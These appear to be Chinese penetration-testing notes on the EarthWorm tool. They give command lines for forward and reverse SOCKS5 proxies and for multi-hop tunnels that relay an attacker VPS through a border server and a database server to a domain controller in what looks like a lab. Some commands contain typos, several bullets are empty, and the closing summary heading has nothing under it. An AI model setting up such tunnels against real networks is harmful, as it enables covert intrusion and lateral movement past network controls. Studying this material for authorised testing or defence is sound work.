【内网渗透】隐藏通信SOCKS代理的使用

1 SOCKS 代理的使用

1.1 EarthWorm的使用

• ssocked 普通环境的正向连接
• rcsocks 反弹使用
• rssocks 反弹使用
• lcx_slave 用于多级网络
• lcx_tran 用户多级网络

./ew -s ssocksd -l 9999 -> 监听9999端口

• 流量成功转发

反弹SOCKS 5 服务器

• 适用于没有外网IP的机器
• VPS
  • VPS添加转接隧道，将在指定端口接收的数据转发到另外一个隧道当中
  • **ew -s rcsocks -l [port1] -e [port2]**
  • **ew** -s rcsocks -l 1080 -e 8888 将8888接受到的数据转发到1080的端口上
• 客户端
  • ew -s rssocks -d [vps_ip] -e [vps_port]
  • ew -s rssocks -d 192.168.91.131 -e 8888
• 
• 
• 
• 成功转发

二级网络环境（A）

• 
• 边界服务器能连接数据库服务器，数据库服务器不通外网
• 思路
  • 在数据库服务器上建立一个正向连接，然后通过边界服务器去连接socks代理，然后通过代理访问到域控
• 操作
  • 将EW上传到数据库服务器中，利用ssocksd方式启动端口的socks代理
    • ew -s ssocksd 8888
  • 边界服务器
    • ew -s lcx_tran -l 1080 -f x.x.x.x -g 8888 -> 将1080收到的代理，转发给x.x.x.x主机的8888端口
      -
      
• 
• 

测试环境情况（二级网络环境）（B）

• 思路
  • 将数据库服务器作为一个跳板去访问域控，在数据库服务器上监听端口，然后再vps中也监听一个端口，最后通过边界服务器将两个隧道连接起来，即VPS可以直接访问域控主机（通过数据库服务器的权限）
• vps
  • ew -s lcx_listen -l 10080 -e 1080 -> 将10080端口接收到的数据转发到1080端口
• 数据库服务器
  • ew -s ssocksd -l 8888
• 边界服务器
  • ew -s lcx_slave -d x.x.x.x(vps) -e 1080- f x.x.x.x(数据库服务器) -g 8888

三级网络环境

• 思路
  • 利用域控去访问核心区域，在边界服务器上将VPS和域控连接起来。
  • 边界服务器将VPS和数据库服务器连接，域控将自己的代理反弹到数据库服务器，这样VPS就可以直接通过域控主机访问核心区域了
• VPS监听
  • ew -s rcsocks -l 1080 -e 9999-> 将9999端口接收到的数据转发到1080上
  • 
• 边界服务器建立转发隧道
  • ew -s lcx_slave -d x.x.x.x(vps) -e 9999 -f x.x.x.x(数据库服务器) -f 9999
  • 
  • 
• 数据库服务器
  • ew -s lcx_listen -l 9999 -e 7777 -> 将本机9999端口转发到7777端口
  • 
• 域控主机
  • ./ew -s rssocks -d 192.168.91.130 7777 -> 连接到数据库服务器的7777端口
  • 
  • 连接成功

流程概括